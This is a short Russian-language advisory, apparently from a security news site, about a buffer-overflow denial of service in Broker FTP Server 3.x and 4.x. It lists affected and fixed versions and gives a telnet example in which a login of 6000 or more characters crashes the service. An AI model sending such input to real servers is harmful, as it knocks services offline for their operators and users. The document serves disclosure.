The USSR Team обнаружила уязвимость в Broker FTP Server, связанную с переполнением буфера и приводящую к DoS’у. Если запущен FTP сервер как сервис, то атакующий может опустить его в даун, отправив в качестве логина 6000 символов или больше.

Системы уязвимы:
Broker FTP Server version 3.x
Broker FTP Server version 4.x

Системы не уязвимы:
Broker FTP Server version 4.3.0.1

Пример:
$ telnet example.com 21
Trying example.com…
Connected to example.com.
Escape character is ‘^]’.
220 FTP Server ready [***]
[buffer]
Где [buffer] — это 6000 символов или больше.



Оставить мнение